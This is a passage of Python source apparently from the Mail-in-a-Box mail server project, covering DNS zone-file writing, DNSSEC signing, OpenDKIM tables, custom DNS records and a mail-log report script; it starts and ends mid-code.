Refresh (secondary nameserver update interval) 3600 ; Retry (when refresh fails, how often to try again, should be lower than the refresh) 1209600 ; Expire (when refresh fails, how long secondary nameserver will keep records around anyway) 86400 ; Negative TTL (how long negative responses are cached) ) """ # Replace replacement strings. zone = zone.format(domain=domain, primary_domain=env["PRIMARY_HOSTNAME"]) # Add records. for subdomain, querytype, value, _explanation in records: if subdomain: zone += subdomain zone += "\tIN\t" + querytype + "\t" if querytype == "TXT": # Divide into 255-byte max substrings. v2 = "" while len(value) > 0: s = value[0:255] value = value[255:] s = s.replace('\\', '\\\\') # escape backslashes s = s.replace('"', '\\"') # escape quotes s = '"' + s + '"' # wrap in quotes v2 += s + " " value = v2 zone += value + "\n" # Append a stable hash of DNSSEC signing keys in a comment. zone += f"\n; DNSSEC signing keys hash: {hash_dnssec_keys(domain, env)}\n" # DNSSEC requires re-signing a zone periodically. That requires # bumping the serial number even if no other records have changed. # We don't see the DNSSEC records yet, so we have to figure out # if a re-signing is necessary so we can prematurely bump the # serial number. force_bump = False if not os.path.exists(zonefile + ".signed"): # No signed file yet. Shouldn't normally happen unless a box # is going from not using DNSSEC to using DNSSEC. force_bump = True else: # We've signed the domain. Check if we are close to the expiration # time of the signature. If so, we'll force a bump of the serial # number so we can re-sign it. with open(zonefile + ".signed", encoding="utf-8") as f: signed_zone = f.read() expiration_times = re.findall(r"\sRRSIG\s+SOA\s+\d+\s+\d+\s\d+\s+(\d{14})", signed_zone) if len(expiration_times) == 0: # weird force_bump = True else: # All of the times should be the same, but if not choose the soonest. expiration_time = min(expiration_times) expiration_time = datetime.datetime.strptime(expiration_time, "%Y%m%d%H%M%S") if expiration_time - datetime.datetime.now() < datetime.timedelta(days=3): # We're within three days of the expiration, so bump serial & resign. force_bump = True # Set the serial number. serial = datetime.datetime.now().strftime("%Y%m%d00") if os.path.exists(zonefile): # If the zone already exists, is different, and has a later serial number, # increment the number. with open(zonefile, encoding="utf-8") as f: existing_zone = f.read() m = re.search(r"(\d+)\s*;\s*serial number", existing_zone) if m: # Clear out the serial number in the existing zone file for the # purposes of seeing if anything *else* in the zone has changed. existing_serial = m.group(1) existing_zone = existing_zone.replace(m.group(0), "__SERIAL__ ; serial number") # If the existing zone is the same as the new zone (modulo the serial number), # there is no need to update the file. Unless we're forcing a bump. if zone == existing_zone and not force_bump and not force: return False # If the existing serial is not less than a serial number # based on the current date plus 00, increment it. Otherwise, # the serial number is less than our desired new serial number # so we'll use the desired new number. if existing_serial >= serial: serial = str(int(existing_serial) + 1) zone = zone.replace("__SERIAL__", serial) # Write the zone file. with open(zonefile, "w", encoding="utf-8") as f: f.write(zone) return True # file is updated def get_dns_zonefile(zone, env): for domain, fn in get_dns_zones(env): if zone == domain: break else: raise ValueError("%s is not a domain name that corresponds to a zone." % zone) nsd_zonefile = "/etc/nsd/zones/" + fn with open(nsd_zonefile, encoding="utf-8") as f: return f.read() ######################################################################## def write_nsd_conf(zonefiles, additional_records, env): # Write the list of zones to a configuration file. nsd_conf_file = "/etc/nsd/nsd.conf.d/zones.conf" nsdconf = "" # Append the zones. for domain, zonefile in zonefiles: nsdconf += f""" zone: name: {domain} zonefile: {zonefile} """ # If custom secondary nameservers have been set, allow zone transfers # and, if not a subnet, notifies to them. for ipaddr in get_secondary_dns(additional_records, mode="xfr"): if "/" not in ipaddr: nsdconf += "\n\tnotify: %s NOKEY" % (ipaddr) nsdconf += "\n\tprovide-xfr: %s NOKEY\n" % (ipaddr) # Check if the file is changing. If it isn't changing, # return False to flag that no change was made. if os.path.exists(nsd_conf_file): with open(nsd_conf_file, encoding="utf-8") as f: if f.read() == nsdconf: return False # Write out new contents and return True to signal that # configuration changed. with open(nsd_conf_file, "w", encoding="utf-8") as f: f.write(nsdconf) return True ######################################################################## def find_dnssec_signing_keys(domain, env): # For key that we generated (one per algorithm)... d = os.path.join(env['STORAGE_ROOT'], 'dns/dnssec') keyconfs = [f for f in os.listdir(d) if f.endswith(".conf")] for keyconf in keyconfs: # Load the file holding the KSK and ZSK key filenames. keyconf_fn = os.path.join(d, keyconf) keyinfo = load_env_vars_from_file(keyconf_fn) # Skip this key if the conf file has a setting named DOMAINS, # holding a comma-separated list of domain names, and if this # domain is not in the list. This allows easily disabling a # key by setting "DOMAINS=" or "DOMAINS=none", other than # deleting the key's .conf file, which might result in the key # being regenerated next upgrade. Keys should be disabled if # they are not needed to reduce the DNSSEC query response size. if "DOMAINS" in keyinfo and domain not in [dd.strip() for dd in keyinfo["DOMAINS"].split(",")]: continue for keytype in ("KSK", "ZSK"): yield keytype, keyinfo[keytype] def hash_dnssec_keys(domain, env): # Create a stable (by sorting the items) hash of all of the private keys # that will be used to sign this domain. keydata = [] for keytype, keyfn in sorted(find_dnssec_signing_keys(domain, env)): oldkeyfn = os.path.join(env['STORAGE_ROOT'], 'dns/dnssec', keyfn + ".private") keydata.extend((keytype, keyfn)) with open(oldkeyfn, encoding="utf-8") as fr: keydata.append( fr.read() ) keydata = "".join(keydata).encode("utf8") return hashlib.sha1(keydata).hexdigest() def sign_zone(domain, zonefile, env): # Sign the zone with all of the keys that were generated during # setup so that the user can choose which to use in their DS record at # their registrar, and also to support migration to newer algorithms. # In order to use the key files generated at setup which are for # the domain _domain_, we have to re-write the files and place # the actual domain name in it, so that ldns-signzone works. # # Patch each key, storing the patched version in /tmp for now. # Each key has a .key and .private file. Collect a list of filenames # for all of the keys (and separately just the key-signing keys). all_keys = [] ksk_keys = [] for keytype, keyfn in find_dnssec_signing_keys(domain, env): newkeyfn = '/tmp/' + keyfn.replace("_domain_", domain) for ext in (".private", ".key"): # Copy the .key and .private files to /tmp to patch them up. # # Use os.umask and open().write() to securely create a copy that only # we (root) can read. oldkeyfn = os.path.join(env['STORAGE_ROOT'], 'dns/dnssec', keyfn + ext) with open(oldkeyfn, encoding="utf-8") as fr: keydata = fr.read() keydata = keydata.replace("_domain_", domain) prev_umask = os.umask(0o77) # ensure written file is not world-readable try: with open(newkeyfn + ext, "w", encoding="utf-8") as fw: fw.write(keydata) finally: os.umask(prev_umask) # other files we write should be world-readable # Put the patched key filename base (without extension) into the list of keys we'll sign with. all_keys.append(newkeyfn) if keytype == "KSK": ksk_keys.append(newkeyfn) # Do the signing. expiry_date = (datetime.datetime.now() + datetime.timedelta(days=30)).strftime("%Y%m%d") shell('check_call', ["/usr/bin/ldns-signzone", # expire the zone after 30 days "-e", expiry_date, # use NSEC3 "-n", # zonefile to sign "/etc/nsd/zones/" + zonefile, ] # keys to sign with (order doesn't matter -- it'll figure it out) + all_keys ) # Create a DS record based on the patched-up key files. The DS record is specific to the # zone being signed, so we can't use the .ds files generated when we created the keys. # The DS record points to the KSK only. Write this next to the zone file so we can # get it later to give to the user with instructions on what to do with it. # # Generate a DS record for each key. There are also several possible hash algorithms that may # be used, so we'll pre-generate all for each key. One DS record per line. Only one # needs to actually be deployed at the registrar. We'll select the preferred one # in the status checks. with open("/etc/nsd/zones/" + zonefile + ".ds", "w", encoding="utf-8") as f: for key in ksk_keys: for digest_type in ('1', '2', '4'): rr_ds = shell('check_output', ["/usr/bin/ldns-key2ds", "-n", # output to stdout "-" + digest_type, # 1=SHA1, 2=SHA256, 4=SHA384 key + ".key" ]) f.write(rr_ds) # Remove the temporary patched key files. for fn in all_keys: os.unlink(fn + ".private") os.unlink(fn + ".key") ######################################################################## def write_opendkim_tables(domains, env): # Append a record to OpenDKIM's KeyTable and SigningTable for each domain # that we send mail from (zones and all subdomains). opendkim_key_file = os.path.join(env['STORAGE_ROOT'], 'mail/dkim/mail.private') if not os.path.exists(opendkim_key_file): # Looks like OpenDKIM is not installed. return False config = { # The SigningTable maps email addresses to a key in the KeyTable that # specifies signing information for matching email addresses. Here we # map each domain to a same-named key. # # Elsewhere we set the DMARC policy for each domain such that mail claiming # to be From: the domain must be signed with a DKIM key on the same domain. # So we must have a separate KeyTable entry for each domain. "SigningTable": "".join( f"*@{domain} {domain}\n" for domain in domains ), # The KeyTable specifies the signing domain, the DKIM selector, and the # path to the private key to use for signing some mail. Per DMARC, the # signing domain must match the sender's From: domain. "KeyTable": "".join( f"{domain} {domain}:mail:{opendkim_key_file}\n" for domain in domains ), } did_update = False for filename, content in config.items(): # Don't write the file if it doesn't need an update. if os.path.exists("/etc/opendkim/" + filename): with open("/etc/opendkim/" + filename, encoding="utf-8") as f: if f.read() == content: continue # The contents needs to change. with open("/etc/opendkim/" + filename, "w", encoding="utf-8") as f: f.write(content) did_update = True # Return whether the files changed. If they didn't change, there's # no need to kick the opendkim process. return did_update ######################################################################## def get_custom_dns_config(env, only_real_records=False): try: with open(os.path.join(env['STORAGE_ROOT'], 'dns/custom.yaml'), encoding="utf-8") as f: custom_dns = rtyaml.load(f) if not isinstance(custom_dns, dict): raise ValueError # caught below except: return [ ] for qname, value in custom_dns.items(): if qname == "_secondary_nameserver" and only_real_records: continue # skip fake record # Short form. Mapping a domain name to a string is short-hand # for creating A records. if isinstance(value, str): values = [("A", value)] # A mapping creates multiple records. elif isinstance(value, dict): values = value.items() # No other type of data is allowed. else: raise ValueError for rtype, value2 in values: if isinstance(value2, str): yield (qname, rtype, value2) elif isinstance(value2, list): for value3 in value2: yield (qname, rtype, value3) # No other type of data is allowed. else: raise ValueError def filter_custom_records(domain, custom_dns_iter): for qname, rtype, value in custom_dns_iter: # We don't count the secondary nameserver config (if present) as a record - that would just be # confusing to users. Instead it is accessed/manipulated directly via (get/set)_custom_dns_config. if qname == "_secondary_nameserver": continue # Is this record for the domain or one of its subdomains? # If `domain` is None, return records for all domains. if domain is not None and qname != domain and not qname.endswith("." + domain): continue # Turn the fully qualified domain name in the YAML file into # our short form (None => domain, or a relative QNAME) if # domain is not None. if domain is not None: qname = None if qname == domain else qname[0:len(qname) - len("." + domain)] yield (qname, rtype, value) def write_custom_dns_config(config, env): # We get a list of (qname, rtype, value) triples. Convert this into a # nice dictionary format for storage on disk. from collections import OrderedDict config = list(config) dns = OrderedDict() seen_qnames = set() # Process the qnames in the order we see them. for qname in [rec[0] for rec in config]: if qname in seen_qnames: continue seen_qnames.add(qname) records = [(rec[1], rec[2]) for rec in config if rec[0] == qname] if len(records) == 1 and records[0][0] == "A": dns[qname] = records[0][1] else: dns[qname] = OrderedDict() seen_rtypes = set() # Process the rtypes in the order we see them. for rtype in [rec[0] for rec in records]: if rtype in seen_rtypes: continue seen_rtypes.add(rtype) values = [rec[1] for rec in records if rec[0] == rtype] if len(values) == 1: values = values[0] dns[qname][rtype] = values # Write. config_yaml = rtyaml.dump(dns) with open(os.path.join(env['STORAGE_ROOT'], 'dns/custom.yaml'), "w", encoding="utf-8") as f: f.write(config_yaml) def set_custom_dns_record(qname, rtype, value, action, env): # validate qname for zone, _fn in get_dns_zones(env): # It must match a zone apex or be a subdomain of a zone # that we are otherwise hosting. if qname == zone or qname.endswith("."+zone): break else: # No match. if qname != "_secondary_nameserver": raise ValueError("%s is not a domain name or a subdomain of a domain name managed by this box." % qname) # validate rtype rtype = rtype.upper() if value is not None and qname != "_secondary_nameserver": if not re.search(DOMAIN_RE, qname): msg = "Invalid name." raise ValueError(msg) if rtype in {"A", "AAAA"}: if value != "local": # "local" is a special flag for us v = ipaddress.ip_address(value) # raises a ValueError if there's a problem if rtype == "A" and not isinstance(v, ipaddress.IPv4Address): raise ValueError("That's an IPv6 address.") if rtype == "AAAA" and not isinstance(v, ipaddress.IPv6Address): raise ValueError("That's an IPv4 address.") elif rtype in {"CNAME", "NS"}: if rtype == "NS" and qname == zone: msg = "NS records can only be set for subdomains." raise ValueError(msg) # ensure value has a trailing dot if not value.endswith("."): value = value + "." if not re.search(DOMAIN_RE, value): msg = "Invalid value." raise ValueError(msg) elif rtype in {"CNAME", "TXT", "SRV", "MX", "SSHFP", "CAA"}: # anything goes pass else: raise ValueError("Unknown record type '%s'." % rtype) # load existing config config = list(get_custom_dns_config(env)) # update newconfig = [] made_change = False needs_add = True for _qname, _rtype, _value in config: if action == "add": if (_qname, _rtype, _value) == (qname, rtype, value): # Record already exists. Bail. return False elif action == "set": if (_qname, _rtype) == (qname, rtype): if _value == value: # Flag that the record already exists, don't # need to add it. needs_add = False else: # Drop any other values for this (qname, rtype). made_change = True continue elif action == "remove": if (_qname, _rtype, _value) == (qname, rtype, value): # Drop this record. made_change = True continue if value is None and (_qname, _rtype) == (qname, rtype): # Drop all qname-rtype records. made_change = True continue else: raise ValueError("Invalid action: " + action) # Preserve this record. newconfig.append((_qname, _rtype, _value)) if action in {"add", "set"} and needs_add and value is not None: newconfig.append((qname, rtype, value)) made_change = True if made_change: # serialize & save write_custom_dns_config(newconfig, env) return made_change ######################################################################## def get_secondary_dns(custom_dns, mode=None): resolver = dns.resolver.get_default_resolver() resolver.timeout = 10 resolver.lifetime = 10 values = [] for qname, _rtype, value in custom_dns: if qname != '_secondary_nameserver': continue for hostname in value.split(" "): hostname = hostname.strip() if mode is None: # Just return the setting. values.append(hostname) continue # If the entry starts with "xfr:" only include it in the zone transfer settings. if hostname.startswith("xfr:"): if mode != "xfr": continue hostname = hostname[4:] # If is a hostname, before including in zone xfr lines, # resolve to an IP address. # It may not resolve to IPv6, so don't throw an exception if it # doesn't. Skip the entry if there is a DNS error. if mode == "xfr": try: ipaddress.ip_interface(hostname) # test if it's an IP address or CIDR notation values.append(hostname) except ValueError: try: response = dns.resolver.resolve(hostname+'.', "A", raise_on_no_answer=False) values.extend(map(str, response)) except dns.exception.DNSException: pass try: response = dns.resolver.resolve(hostname+'.', "AAAA", raise_on_no_answer=False) values.extend(map(str, response)) except dns.exception.DNSException: pass else: values.append(hostname) return values def set_secondary_dns(hostnames, env): if len(hostnames) > 0: # Validate that all hostnames are valid and that all zone-xfer IP addresses are valid. resolver = dns.resolver.get_default_resolver() resolver.timeout = 5 resolver.lifetime = 5 for item in hostnames: if not item.startswith("xfr:"): # Resolve hostname. try: resolver.resolve(item, "A") except (dns.resolver.NoNameservers, dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.Timeout): try: resolver.resolve(item, "AAAA") except (dns.resolver.NoNameservers, dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.Timeout): raise ValueError("Could not resolve the IP address of %s." % item) else: # Validate IP address. try: if "/" in item[4:]: ipaddress.ip_network(item[4:]) # raises a ValueError if there's a problem else: ipaddress.ip_address(item[4:]) # raises a ValueError if there's a problem except ValueError: raise ValueError("'%s' is not an IPv4 or IPv6 address or subnet." % item[4:]) # Set. set_custom_dns_record("_secondary_nameserver", "A", " ".join(hostnames), "set", env) else: # Clear. set_custom_dns_record("_secondary_nameserver", "A", None, "set", env) # Apply. return do_dns_update(env) def get_custom_dns_records(custom_dns, qname, rtype): for qname1, rtype1, value in custom_dns: if qname1 == qname and rtype1 == rtype: yield value ######################################################################## def build_recommended_dns(env): ret = [] for (domain, _zonefile, records) in build_zones(env): # remove records that we don't display records = [r for r in records if r[3] is not False] # put Required at the top, then Recommended, then everythiing else records.sort(key = lambda r : 0 if r[3].startswith("Required.") else (1 if r[3].startswith("Recommended.") else 2)) # expand qnames for i in range(len(records)): qname = domain if records[i][0] is None else records[i][0] + "." + domain records[i] = { "qname": qname, "rtype": records[i][1], "value": records[i][2], "explanation": records[i][3], } # return ret.append((domain, records)) return ret if __name__ == "__main__": from utils import load_environment env = load_environment() if sys.argv[-1] == "--lint": write_custom_dns_config(get_custom_dns_config(env), env) else: for _zone, records in build_recommended_dns(env): for record in records: print("; " + record['explanation']) print(record['qname'], record['rtype'], record['value'], sep="\t") print() File: management/mail_log.py #!/usr/local/lib/mailinabox/env/bin/python import argparse import datetime import gzip import os.path import re import shutil import tempfile import textwrap from collections import defaultdict, OrderedDict import dateutil.parser import time from dateutil.relativedelta import relativedelta import utils LOG_FILES = ( '/var/log/mail.log.6.gz', '/var/log/mail.log.5.gz', '/var/log/mail.log.4.gz', '/var/log/mail.log.3.gz', '/var/log/mail.log.2.gz', '/var/log/mail.log.1', '/var/log/mail.log', ) TIME_DELTAS = OrderedDict([ ('all', datetime.timedelta(weeks=52)), ('month', datetime.timedelta(weeks=4)), ('2weeks', datetime.timedelta(days=14)), ('week', datetime.timedelta(days=7)), ('2days', datetime.timedelta(days=2)), ('day', datetime.timedelta(days=1)), ('12hours', datetime.timedelta(hours=12)), ('6hours', datetime.timedelta(hours=6)), ('hour', datetime.timedelta(hours=1)), ('30min', datetime.timedelta(minutes=30)), ('10min', datetime.timedelta(minutes=10)), ('5min', datetime.timedelta(minutes=5)), ('min', datetime.timedelta(minutes=1)), ('today', datetime.datetime.now() - datetime.datetime.now().replace(hour=0, minute=0, second=0)) ]) END_DATE = NOW = datetime.datetime.now() START_DATE = None VERBOSE = False # List of strings to filter users with FILTERS = None # What to show (with defaults) SCAN_OUT = True # Outgoing email SCAN_IN = True # Incoming email SCAN_DOVECOT_LOGIN = True # Dovecot Logins SCAN_GREY = False # Greylisted email SCAN_BLOCKED = False # Rejected email def scan_files(collector): """ Scan files until they run out or the earliest date is reached """ stop_scan = False for fn in LOG_FILES: tmp_file = None if not os.path.exists(fn): continue elif fn[-3:] == '.gz': tmp_file = tempfile.NamedTemporaryFile() with gzip.open(fn, 'rb') as f: shutil.copyfileobj(f, tmp_file) if VERBOSE: print("Processing file", fn, "...") fn = tmp_file.name if tmp_file else fn for line in readline(fn): if scan_mail_log_line(line.strip(), collector) is False: if stop_scan: return stop_scan = True else: stop_scan = False def scan_mail_log(env): """ Scan the system's mail log files and collect interesting data This function scans the 2 most recent mail log files in /var/log/. Args: env (dict): Dictionary containing MiaB settings """ collector = { "scan_count": 0, # Number of lines scanned "parse_count": 0, # Number of lines parsed (i.e. that had their contents examined) "scan_time": time.time(), # The time in seconds the scan took "sent_mail": OrderedDict(), # Data about email sent by users "received_mail": OrderedDict(), # Data about email received by users "logins": OrderedDict(), # Data about login activity "postgrey": {}, # Data about greylisting of email addresses "rejected": OrderedDict(), # Emails that were blocked "known_addresses": None, # Addresses handled by the Miab installation "other-services": set(), } try: import mailconfig collector["known_addresses"] = (set(mailconfig.get_mail_users(env)) | {alias[0] for alias in mailconfig.get_mail_aliases(env)}) except ImportError: pass print(f"Scanning logs from {START_DATE:%Y-%m-%d %H:%M:%S} to {END_DATE:%Y-%m-%d %H:%M:%S}" ) # Scan the lines in the log files until the date goes out of range scan_files(collector) if not collector["scan_count"]: print("No log lines scanned...") return collector["scan_time"] = time.time() - collector["scan_time"] print("{scan_count} Log lines scanned, {parse_count} lines parsed in {scan_time:.2f} " "seconds\n".format(**collector)) # Print Sent Mail report if collector["sent_mail"]: msg = "Sent email" print_header(msg) data = OrderedDict(sorted(collector["sent_mail"].items(), key=email_sort)) print_user_table( data.keys(), data=[ ("sent", [u["sent_count"] for u in data.values()]), ("hosts", [len(u["hosts"]) for u in data.values()]), ], sub_data=[ ("sending hosts", [u["hosts"] for u in data.values()]), ], activity=[ ("sent", [u["activity-by-hour"] for u in data.values()]), ], earliest=[u["earliest"] for u in data.values()], latest=[u["latest"] for u in data.values()], ) accum = defaultdict(int) data = collector["sent_mail"].values() for h in range(24): accum[h] = sum(d["activity-by-hour"][h] for d in data) print_time_table( ["sent"], [accum] ) # Print Received Mail report if collector["received_mail"]: msg = "Received email" print_header(msg) data = OrderedDict(sorted(collector["received_mail"].items(), key=email_sort)) print_user_table( data.keys(), data=[ ("received", [u["received_count"] for u in data.values()]), ], activity=[ ("sent", [u["activity-by-hour"] for u in data.values()]), ], earliest=[u["earliest"] for u in data.values()], latest=[u["latest"] for u in data.values()], ) accum = defaultdict(int) for h in range(24): accum[h] = sum(d["activity-by-hour"][h] for d in data.values()) print_time_table( ["received"], [accum] ) # Print login report if collector["logins"]: msg = "User logins per hour" print_header(msg) data = OrderedDict(sorted(collector["logins"].items(), key=email_sort)) # Get a list of all of the protocols seen in the logs in reverse count order. all_protocols = defaultdict(int) for u in data.values(): for protocol_name, count in u["totals_by_protocol"].items(): all_protocols[protocol_name] += count all_protocols = [k for k, v in sorted(all_protocols.items(), key=lambda kv : -kv[1])] print_user_table( data.keys(), data=[ (protocol_name, [ round(u["totals_by_protocol"][protocol_name] / (u["latest"]-u["earliest"]).total_seconds() * 60*60, 1) if (u["latest"]-u["earliest"]).total_seconds() > 0 else 0 # prevent division by zero for u in data.values()]) for protocol_name in all_protocols ], sub_data=[ ("Protocol and Source", [[ f"{protocol_name} {host}: {count} times" for (protocol_name, host), count in sorted(u["totals_by_protocol_and_host"].items(), key=lambda kv:-kv[1]) ] for u in data.values()]) ], activity=[ (protocol_name, [u["activity-by-hour"][protocol_name] for u in data.values()]) for protocol_name in all_protocols ], earliest=[u["earliest"] for u in data.values()], latest=[u["latest"] for u in data.values()], numstr=lambda n : str(round(n, 1)), ) accum = { protocol_name: defaultdict(int) for protocol_name in all_protocols } for h in range(24): for protocol_name in all_protocols: accum[protocol_name][h] = sum(d["activity-by-hour"][protocol_name][h] for d in data.values()) print_time_table( all_protocols, [accum[protocol_name] for protocol_name in all_protocols] ) if collector["postgrey"]: msg = "Greylisted Email {:%Y-%m-%d %H:%M:%S} and {:%Y-%m-%d %H:%M:%S}" print_header(msg.format(START_DATE, END_DATE)) print(textwrap.fill( "The following mail was greylisted, meaning the emails were temporarily rejected. " "Legitimate senders must try again after three minutes.", width=80, initial_indent=" ", subsequent_indent=" " ), end='\n\n') data = OrderedDict(sorted(collector["postgrey"].items(), key=email_sort)) users = [] received = [] senders = [] sender_clients = [] delivered_dates = [] for recipient in data: sorted_recipients = sorted(data[recipient].items(), key=lambda kv: kv[1][0] or kv[1][1]) for (client_address, sender), (first_date, delivered_date) in sorted_recipients: if first_date: users.append(recipient) received.append(first_date) senders.append(sender) delivered_dates.append(delivered_date) sender_clients.append(client_address) print_user_table( users, data=[ ("received", received), ("sender", senders), ("delivered", [str(d) or "no retry yet" for d in delivered_dates]), ("sending host", sender_clients) ], delimit=True, ) if collector["rejected"]: msg = "Blocked Email {:%Y-%m-%d %H:%M:%S} and {:%Y-%m-%d %H:%M:%S}" print_header(msg.format(START_DATE, END_DATE)) data = OrderedDict(sorted(collector["rejected"].items(), key=email_sort)) rejects = [] if VERBOSE: for user_data in data.values(): user_rejects = [] for date, sender, message in user_data["blocked"]: if len(sender) > 64: sender = sender[:32] + "…" + sender[-32:] user_rejects.extend((f'{date} - {sender} ', ' %s' % message)) rejects.append(user_rejects) print_user_table( data.keys(), data=[ ("blocked", [len(u["blocked"]) for u in data.values()]), ], sub_data=[ ("blocked emails", rejects), ], earliest=[u["earliest"] for u in data.values()], latest=[u["latest"] for u in data.values()], ) if collector["other-services"] and VERBOSE and False: print_header("Other services") print("The following unknown services were found in the log file.") print(" ", *sorted(collector["other-services"]), sep='\n│ ') def scan_mail_log_line(line, collector): """ Scan a log line and extract interesting data """ m = re.match(r"(\w+[\s]+\d+ \d+:\d+:\d+) ([\w]+ )?([\w\-/]+)[^:]*: (.*)", line) if not m: return True date, _system, service, log = m.groups() collector["scan_count"] += 1 # print() # print("date:", date) # print("host:", system) # print("service:", service) # print("log:", log) # Replaced the dateutil parser for a less clever way of parser that is roughly 4 times faster. # date = dateutil.parser.parse(date) # strptime fails on Feb 29 with ValueError: day is out of range for month if correct year is not provided. # See https://bugs.python.org/issue26460 date = datetime.datetime.strptime(str(NOW.year) + ' ' + date, '%Y %b %d %H:%M:%S') # if log date in future, step back a year if date > NOW: date = date.replace(year = NOW.year - 1) #print("date:", date) # Check if the found date is within the time span we are scanning if date > END_DATE: # Don't process, and halt return False elif date < START_DATE: # Don't process, but continue return True if service == "postfix/submission/smtpd": if SCAN_OUT: scan_postfix_submission_line(date, log, collector) elif service == "postfix/lmtp": if SCAN_IN: scan_postfix_lmtp_line(date, log, collector) elif service.endswith("-login"): if SCAN_DOVECOT_LOGIN: scan_dovecot_login_line(date, log, collector, service[:4]) elif service == "postgrey": if SCAN_GREY: scan_postgrey_line(date, log, collector) elif service == "postfix/smtpd": if SCAN_BLOCKED: scan_postfix_smtpd_line(date, log, collector) elif service in {"postfix/qmgr", "postfix/pickup", "postfix/cleanup", "postfix/scache", "spampd", "postfix/anvil", "postfix/master", "opendkim", "postfix/lmtp", "postfix/tlsmgr", "anvil"}: # nothing to look at return True else: collector["other-services"].add(service) return True collector["parse_count"] += 1 return True def scan_postgrey_line(date, log, collector): """ Scan a postgrey log line and extract interesting data """ m = re.match(r"action=(greylist|pass), reason=(.*?), (?:delay=\d+, )?client_name=(.*), " "client_address=(.*), sender=(.*), recipient=(.*)", log) if m: action, reason, client_name, client_address, sender, user = m.groups() if user_match(user): # Might be useful to group services that use a lot of mail different servers on sub # domains like <sub>1.domein.com # if '.' in client_name: # addr = client_name.split('.') # if len(addr) > 2: # client_name = '.'.join(addr[1:]) key = (client_address if client_name == 'unknown' else client_name, sender) rep = collector["postgrey"].setdefault(user, {}) if action == "greylist" and reason == "new": rep[key] = (date, rep[key][1] if key in rep else None) elif action == "pass": rep[key] = (rep[key][0] if key in rep else None, date) def scan_postfix_smtpd_line(date, log, collector): """ Scan a postfix smtpd log line and extract interesting data """ # Check if the incoming mail was rejected m = re.match("NOQUEUE: reject: RCPT from .*?: (.*?); from=<(.*?)> to=<(.*?)>", log) if m: message, sender, user = m.groups() # skip this, if reported in the greylisting report if "Recipient address rejected: Greylisted" in message: return # only log mail to known recipients if user_match(user) and (collector["known_addresses"] is None or user in collector["known_addresses"]): data = collector["rejected"].get( user, { "blocked": [], "earliest": None, "latest": None, } ) # simplify this one m = re.search( r"Client host \[(.*?)\] blocked using zen.spamhaus.org; (.*)", message ) if m: message = "ip blocked: " + m.group(2) else: # simplify this one too m = re.search( r"Sender address \[.*@(.*)\] blocked using dbl.spamhaus.org; (.*)", message ) if m: message = "domain blocked: " + m.group(2) if data["earliest"] is None: data["earliest"] = date data["latest"] = date data["blocked"].append((date, sender, message)) collector["rejected"][user] = data def scan_dovecot_login_line(date, log, collector, protocol_name): """ Scan a dovecot login log line and extract interesting data """ m = re.match("Info: Login: user=<(.*?)>, method=PLAIN, rip=(.*?),", log) if m: # TODO: CHECK DIT user, host = m.groups() if user_match(user): add_login(user, date, protocol_name, host, collector) def add_login(user, date, protocol_name, host, collector): # Get the user data, or create it if the user is new data = collector["logins"].get( user, { "earliest": None, "latest": None, "totals_by_protocol": defaultdict(int), "totals_by_protocol_and_host": defaultdict(int), "activity-by-hour": defaultdict(lambda : defaultdict(int)), } ) if data["earliest"] is None: data["earliest"] = date data["latest"] = date data["totals_by_protocol"][protocol_name] += 1 data["totals_by_protocol_and_host"][(protocol_name, host)] += 1 if host not in {"127.0.0.1", "::1"} or True: data["activity-by-hour"][protocol_name][date.hour] += 1 collector["logins"][user] = data def scan_postfix_lmtp_line(date, log, collector): """ Scan a postfix lmtp log line and extract interesting data It is assumed that every log of postfix/lmtp indicates an email that was successfully received by Postfix. """ m = re.match(r"([A-Z0-9]+): to=<(\S+)>, .* Saved", log) if m: _, user = m.groups() if user_match(user): # Get the user data, or create it if the user is new data = collector["received_mail"].get( user, { "received_count": 0, "earliest": None, "latest": None, "activity-by-hour": defaultdict(int), } ) data["received_count"] += 1 data["activity-by-hour"][date.hour] += 1 if data["earliest"] is None: data["earliest"] = date data["latest"] = date collector["received_mail"][user] = data def scan_postfix_submission_line(date, log, collector): """ Scan a postfix submission log line and extract interesting data Lines containing a sasl_method with the values PLAIN or LOGIN are assumed to indicate a sent email. """ # Match both the 'plain' and 'login' sasl methods, since both authentication methods are # allowed by Dovecot. Exclude trailing comma after the username when additional fields # follow after. m = re.match(r"([A-Z0-9]+): client=(\S+), sasl_method=(PLAIN|LOGIN), sasl_username=(\S+)(?<!,)", log) if m: _, client, _method, user = m.groups() if user_match(user): # Get the user data, or create it if the user is new data = collector["sent_mail"].get( user, { "sent_count": 0, "hosts": set(), "earliest": None, "latest": None, "activity-by-hour": defaultdict(int), } ) data["sent_count"] += 1 data["hosts"].add(client) data["activity-by-hour"][date.hour] += 1 if data["earliest"] is None: data["earliest"] = date data["latest"] = date collector["sent_mail"][user] = data # Also log this as a login. add_login(user, date, "smtp", client, collector) # Utility functions def readline(filename): """ A generator that returns the lines of a file """ with open(filename, errors='replace', encoding='utf-8') as file: while True: line = file.readline() if not line: break yield line def user_match(user): """ Check if the given user matches any of the filters """ return FILTERS is None or any(u in user for u in FILTERS) def email_sort(email): """ Split the given email address into a reverse order tuple, for sorting i.e (domain, name) """ return tuple(reversed(email[0].split('@'))) def valid_date(string): """ Validate the given date string fetched from the --enddate argument """ try: date = dateutil.parser.parse(string) except ValueError: raise argparse.ArgumentTypeError("Unrecognized date and/or time '%s'" % string) return date # Print functions def print_time_table(labels, data, do_print=True): labels.insert(0, "hour") data.insert(0, [str(h) for h in range(24)]) temp = "│ {:<%d} " % max(len(l) for l in labels) lines = [temp.format(label) for label in labels] for h in range(24): max_len = max(len(str(d[h])) for d in data) base = "{:>%d} " % max(2, max_len) for i, d in enumerate(data): lines[i] += base.format(d[h]) lines.insert(0, "┬ totals by time of day:") lines.append("└" + (len(lines[-1]) - 2) * "─") if do_print: print("\n".join(lines)) return None else: return lines def print_user_table(users, data=None, sub_data=None, activity=None, latest=None, earliest=None, delimit=False, numstr=str): str_temp = "{:<32} " lines = [] data = data or [] col_widths = len(data) * [0] col_left = len(data) * [False] vert_pos = 0 do_accum = all(isinstance(n, (int, float)) for _, d in data for n in d) data_accum = len(data) * ([0] if do_accum else [" "]) last_user = None for row, user in enumerate(users): if delimit: if last_user and last_user != user: lines.append(len(lines[-1]) * "…") last_user = user line = "{:<32} ".format(user[:31] + "…" if len(user) > 32 else user) for col, (l, d) in enumerate(data): if isinstance(d[row], str): col_str = str_temp.format(d[row][:31] + "…" if len(d[row]) > 32 else d[row]) col_left[col] = True elif isinstance(d[row], datetime.datetime): col_str = 